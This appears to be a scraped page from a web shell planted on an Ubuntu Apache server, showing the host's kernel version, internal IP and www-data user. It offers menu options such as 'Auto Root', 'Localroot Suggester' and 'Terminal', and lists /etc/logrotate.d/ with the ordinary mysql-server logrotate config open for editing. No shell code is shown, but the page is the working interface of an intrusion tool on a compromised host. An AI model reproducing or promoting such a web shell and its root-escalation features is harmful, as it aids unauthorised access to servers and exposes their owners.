Linux anchor 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64
Apache/2.4.18 (Ubuntu)
Server IP : 10.10.100.4 & Your IP : 216.73.217.150
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
etc /
logrotate.d /
Delete
Unzip
Name
Size
Permission
Date
Action
apache2
433
B
-rw-r--r--
2016-03-19 10:48
apport
126
B
-rw-r--r--
2016-05-18 11:14
apt
173
B
-rw-r--r--
2016-04-05 20:24
certbot
82
B
-rw-r--r--
2018-01-31 03:02
dpkg
232
B
-rw-r--r--
2015-06-10 04:52
lxd
146
B
-rw-r--r--
2016-12-05 13:45
mysql-server
845
B
-rw-r--r--
2016-07-11 15:36
rsyslog
501
B
-rw-r--r--
2019-03-20 03:08
ubuntu-advantage-tools
270
B
-rw-r--r--
2022-04-01 15:27
ufw
178
B
-rw-r--r--
2014-08-07 14:58
unattended-upgrades
235
B
-rw-r--r--
2016-02-18 23:19
waagent.logrotate
92
B
-rw-r--r--
2016-01-26 16:26
Save
Rename
# - I put everything in one block and added sharedscripts, so that mysql gets # flush-logs'd only once. # Else the binary logs would automatically increase by n times every day. # - The error log is obsolete, messages go to syslog now. /var/log/mysql.log /var/log/mysql/*log { daily rotate 7 missingok create 640 mysql adm compress sharedscripts postrotate test -x /usr/bin/mysqladmin || exit 0 # If this fails, check debian.conf! MYADMIN="/usr/bin/mysqladmin --defaults-file=/etc/mysql/debian.cnf" if [ -z "`$MYADMIN ping 2>/dev/null`" ]; then # Really no mysqld or rather a missing debian-sys-maint user? # If this occurs and is not a error please report a bug. #if ps cax | grep -q mysqld; then if killall -q -s0 -umysql mysqld; then exit 1 fi else $MYADMIN flush-logs fi endscript }